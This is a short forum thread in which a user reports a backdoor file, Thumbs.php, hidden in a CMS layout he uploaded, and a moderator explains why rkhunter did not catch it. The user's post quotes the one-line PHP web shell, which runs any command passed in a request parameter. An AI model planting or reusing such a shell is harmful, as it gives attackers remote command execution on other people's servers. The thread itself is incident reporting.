why rkhunter not detected this backdoor

Discussion in 'Developers' Forum' started by lanceq, Feb 25, 2012.

  1. lanceq

    lanceq New Member

    Hello,
    Yesterday someone sent me the layout of the CMS, i upload it to my server, including the layout was a backdoor Thumbs.php file, this file contains:
    Code:
    <pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
    It seems to me that this backdoor exactly:

    http://www.xakep.ru/magazine/xa/124/038/1.asp

    This person has execute this script by adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.

    I have ispconfig 3.0.4.3, why rkhunter did not block this backdoor?
    I thought these programs with ispconfig will protect me from the backdoor
     
  2. falko

    falko Super Moderator

    First, rkhunter doesn't remove anything - it just detects malware, trojans, etc., and warns you.

    Second, it doesn't check PHP scripts (how should this work? How should it know the hash of a bad PHP script that someone uploads to your server?).
     

Share This Page